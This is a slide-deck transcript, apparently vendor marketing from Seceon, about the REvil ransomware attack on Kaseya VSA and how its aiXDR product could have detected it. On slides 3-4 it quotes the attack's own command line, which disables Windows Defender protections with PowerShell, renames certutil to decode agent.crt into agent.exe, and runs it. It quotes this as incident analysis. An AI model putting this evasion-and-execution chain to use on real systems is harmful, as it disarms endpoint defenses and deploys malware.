How Seceon could have stopped the Ransomware roll over Kaseya

presentation player overlay
About This Presentation
Transcript and Presenter's Notes

Title: How Seceon could have stopped the Ransomware roll over Kaseya


1
How Seceon could have stopped the Ransomware
roll over Kaseya.
The attack and ways will keep on changing, one of
the most Recent attack that Kaseya faced is the
result of what where industry is missing in
terms of Cybersecurity. The attack on Kaseya came
in action a few days ago. The sudden attack
emerged in a brutal way infecting around 1500
businesses worldwide as per the statement by
Kaseyas CEO. The names of infected companies
are not yet out. The observed result of this
attackswas seen with Swedish Coop supermarket
which was forced to close. They are among one of
the clients of these MSPs which were hacked and
got infected with 2100 endpoints.
2
A 70 millions ransom was demanded for data
backup. The REvil Ransomware gang is being
considered responsible for this operation. Its
still a mystery whether REvil prepared this
attack themselves or it was from any of their
associates. Kaseya has been completely forced to
shut down their cloud infrastructure to stop
malicious updates from spreading and they
completely advised their customer to power down
their servers and thats created a lot of
chaos. What is VSA, How it got compromised and
Ransomware rolled over it.. VSA is a remote
monitoring tool, a kind of remote access tool or
RAT that allows to have the complete access of
system or device its installed on, which helps
IT Technicians to diagnose and fix problems
remotely. Every organization doesnt have
resources to manage their infrastructure in
house, so they outsource this as a task to MSP
(Managed Service Provider). These MSPs often
manage the system of hundreds of companies
simultaneously. Kaseya is an MSP provider with
VSA as a product it has its own prem version,
which is run by the customer in their
environment, this is typically needed by MSPs to
manage all their client system and this was
something that was off with Kaseya server that
was used to manage lot of their clients. Having
the access of this server will itself allow it
to have the access of all clients associated with
it. And this how it was compromised at
initial. Soon after the attack rolled out all the
VSA Server were advised to close. The operation
was huge enough to infect the business, it was
the mass ransomware unlike the ransomware that we
know usually where organizations get infected
with Ransomware and all system they get encrypt
and are ask for ransom, here case was quite
different where 100s of organization around the
world got encrypted simultaneously with the same
ransomware campaign which was tunnelled during
the software update in Kaseya, since from the
inception it moved in a supply chain attack. It
was a kind of compromise of Kaseya which was
operated on VSA
3
server rather than any of their directory
directly that we usually see in Ransomware. The
VSA server was used to ransomware a lot of
organizations in single click and this is what
has happened at high level in it. How does it
propagate? The scenario is like If there is a
device using Kaseyas agent to monitor all the
device subjected to policy and that is connected
to central server and that server is affected
then the entire system connected with it is at
higher risk, and this is how it propagated in the
form of chain attack one after the other and
affected 1000s of server.
  • How did the initial compromise begin and aiXDR
    detection?
  • As VSA server vulnerability was exploited, Seceon
    aiXDR can detect and remediate exploited
    vulnerabilities and zero day attack in very
    early stages. Here is the steps by steps
    analysis
  • aiXDR monitors all inbound and outbound
    connections and in this case aiXDR should have
    detected a connection from Blacklisted IPs or
    from a prohibited country and automatically
    blocked that connection.
  • Once connection was made it was trying to
    download/upload agent.exe on the host , aiXDR
    can detect data exfiltration and in this case
    aiXDR should have blocked that connection so it
    can not download the agent.exe or transfers the
    data to external hosts.
  • Also when the host had agent.exe downloaded, it
    was doing a different type of scan to get access
    to another host aiXDR should have detected
    those scans and automatically quarantined that
    host so it can not infect other hosts.
  • Following PowerShell command was launched by the
    C\Program Files (x86)\Kaseya\ltIDgt\AgentMon.exe
    file of the Kaseya VSA platform.
  • C\WINDOWS\system32\cmd.exe /c ping 127.0.0.1
    -n 4979 gt nul C\Windows\System32\WindowsPowerSh
    ell\v1.0\powershell.exe Set-MpPreference

4
  • -DisableRealtimeMonitoring true
  • -DisableIntrusionPreventionSystem true
    -DisableIOAVProtection
  • true -DisableScriptScanning true
  • -EnableControlledFolderAccess Disabled
  • -EnableNetworkProtection AuditMode -Force
    -MAPSReporting Disabled -SubmitSamplesConsent
    NeverSend copy /Y C\Windows\System32\certutil.
    exe C\Windows\cert.exe echo
  • RANDOM gtgt C\Windows\cert.exe
    C\Windows\cert.exe
  • -decode c\kworking\agent.crt c\kworking\agent.ex
    e del /q /f c\kworking\agent.crt
    C\Windows\cert.exe c\kworking\agent.exe
  • As the AgentMon.exe starts its 1st process to
    execute the powershell command the aiXDR would
    have detected a new process started as
    AgentMon.exe from C\Program Files (x86)\Kaseya\
  • aiXDR detects if any protection service is
    disabled on the host as we can see in this case
    they were trying to disable protection services
  • aiXDR detects if any process is renamed as
    Masquerading as we can see in this case
    certutil.exe was renamed as cert.exe .

What was the impact of this? The threat actor was
able to manage execution of code that enabled
them to search scripts that linked with Kaseyas
application to pull out certain procedures or
agent updates. It was part of the functionality
of the application to push out procedures through
all managed agents. These agents run on the
computer which is managed by this solution.
They simply run the script to all managed
clients and that triggered a file copy and
execution of script to all managed clients. This
is how they ended by infecting all these
systems. There were a couple of steps that were
initiated step by step to make a complete
successful attempt for attack but surprisingly it
was never looked at and detected in between.
5
  • Approach after Infected ?
  • There are always different indicators left on the
    system to know how its being compromised or
    not, here in this case it has been identified
    that logs have been cleared at multiple stages.
    The logs were gone and other types of logs
    inside the application database itself were
    deleted but still some logs were there to know
    what VSA server has put out to manage clients.
    These logs became a point to bring out the
    investigation of how the system was targeted from
    the VSA server.
  • Few indications of Being Ransomware.
  • Ransomware is coming out as a complete business
    model and the threat actors are making a lot of
    money out of it. Below are few indications
    mentioned below
  • All files in the system get encrypted and left
    with a README file saying about ransom amount.
    It will change the file extension which is a
    clear indication of attack occurrence.
  • Some of the files they may or may not get
    encrypted this happen in the case where
    ransomware did not execute successfully i.e it
    gets executed partially.
  • Provisional execution that disables antivirus
    functionality such as Windows defender or other
    security layers.

Brief About Seceon aiXDR
Seceon aiXDR is highly effective, enriched with
capability of machine learning, AI, Big data,
Dynamic threat intel, strong correlation and
in-depth analysis which easily allows to cut
throw the threat roots at very initial stage. The
solution detects the threat origin whether its
coming from Network, application, host or
machine learning. It comes out with one of the
most interesting feature to show anything and
everything that was done to make the attack
attempt and how Seceon solution stopped the way
in between to make the
6
... environment secure with 360 degree
Comprehensive visibility, Proactive Threat
Detection, Auto stopping of Threat and breaches
in Real time. The customer should always make
sure that they are not just taking a solution
which is problem specific, the solution should
always be capable of saving the environment from
all kinds of threat and malicious activity
whether it is known or unknown. The Seceon aiXDR
is a single all-in-one platform. That helps to
eliminate the use of silos based solutions and
delivers the effective essential result in
Comprehensive manner.
Diag. show the Seceon aiXDR approach Continuous
real-time Monitoring, proactive Detection auto
Stop threats and breaches Best Cybersecurity
ROI.
7
Contact Us
Address -238 Littleton Road, Suite 206,Westford,
MA 01886, USA Phone Number - 1 (978)-923-0040
Email Id - sales_at_seceon.com , info_at_seceon.com
Website - https//www.seceon.com/ Twitter -
https//twitter.com/Seceon_Inc
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2025 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The : "How Seceon could have stopped the Ransomware roll over Kaseya" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!